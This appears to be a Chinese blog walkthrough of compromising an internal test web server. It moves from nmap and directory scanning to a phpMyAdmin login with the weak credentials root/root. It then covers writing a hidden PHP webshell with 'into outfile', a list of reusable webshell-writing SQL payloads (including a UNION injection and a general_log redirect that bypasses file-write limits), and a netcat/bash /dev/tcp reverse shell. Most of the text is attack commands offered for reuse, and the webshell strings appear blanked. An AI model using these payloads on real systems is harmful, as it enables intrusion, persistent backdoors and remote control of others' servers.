暴力破解+文件遍历(通过phpMyAdmin拿到shell)

公司测试地址:10.0.3.45

测试地址是内网,外网访问不了

这里暴力破解指目录暴破,对于phpMyAdmin来说,因为是弱口令这里就没有暴破,需要的话可以利用burp进行暴力破解

还有一款专门用于phpMyAdmin的破解工具,不做演示了

工具链接

链接:https://pan.baidu.com/s/1Bcdt4sMR1KDRNzj_-bG4-g  密码:rq83

 

 

今天是暴力破解+目录遍历

用到的工具:nmap 御剑 菜刀

首先用nmap扫描,发现开放端口

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第1张图片

看到3306端口开启,

思路1:爆破3306的root密码 或者ssh密码,有了3306的密码登录,用into outfile导出一句话到web目录下

思路2:目录遍历读写配置文件,登录mysql,导出webshell

 

这里我用的是思路2

 

用御剑扫描目标网站

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第2张图片

第一个url访问没什么用,访问第二个URL

将data.zip下载下来,解压,发现robots.txt,打开

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第3张图片

访问此地址

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第4张图片

发现phpMyAdmin,点进去

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第5张图片

用户名密码是弱口令root/root

登录进去,写入webshell

select '' into outfile '/var/www/html/.log.php'

并执行

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第6张图片

文件名前面加点是隐藏文件,使用ls命令看不到,只有使用ls -a 才能看到

 

执行成功,连接菜刀

菜刀地址写:10.0.3.45/.log.php 密码为1

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第7张图片

 

成功。

 

 

分享一些sql写马的语句

 

select '' into outfile '/data/www/heneng/cp/log.php'

 

select '' into outfile 'D:/phpStudy/WWW/22.php'

 

 

' and 1=2 union all select '',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile 'f:/desktop/22.php'#'

 

 

select count(*) as doyo_total_page from dy_message where isshow=1 and tid=23

 

 

phpmyadmin 导出一句话(安全策略)

set global general_log='on';

SET global general_log_file='D:/phpStudy/WWW/cmd.php';

SELECT '';

 

这些的区别 我不太清楚 同事是这么说的

前三种是同一个方法啊

第四个不是 是个注入语句

最后一种是mysql自身的 在存在安全策略的时候不能用outfile或者dumpfile函数写文件的时候 利用mysql 自身的log文件重定向方法写入webshell但是webshell会随着访问数量大变的很大 传完拿下换个shell就好

 

最后一种不一定要在 phpmyadmin 里

 

 

 

在菜刀中执行不方便可以利用nc反弹shell

在自己的服务端使用nc(kail自带,可以直接执行)

输入命令:nc -lvvp 45678   (45678是可以自己定义的端口,不冲突就好,-l是监听,-vv是得到更详细的内容,-p是指定端口)

连接上菜刀后在被攻击方的服务器上使用命令

bash -i >& /dev/tcp/10.0.3.62/45678 0>&1   (10.0.3.62是我自己执行上一条nc命令的服务器地址,45678是端口号,与上一条相同)

 

执行后会反弹shell

暴力破解+文件遍历(通过phpMyAdmin拿到shell)_第8张图片

 

 

你可能感兴趣的:(漏洞)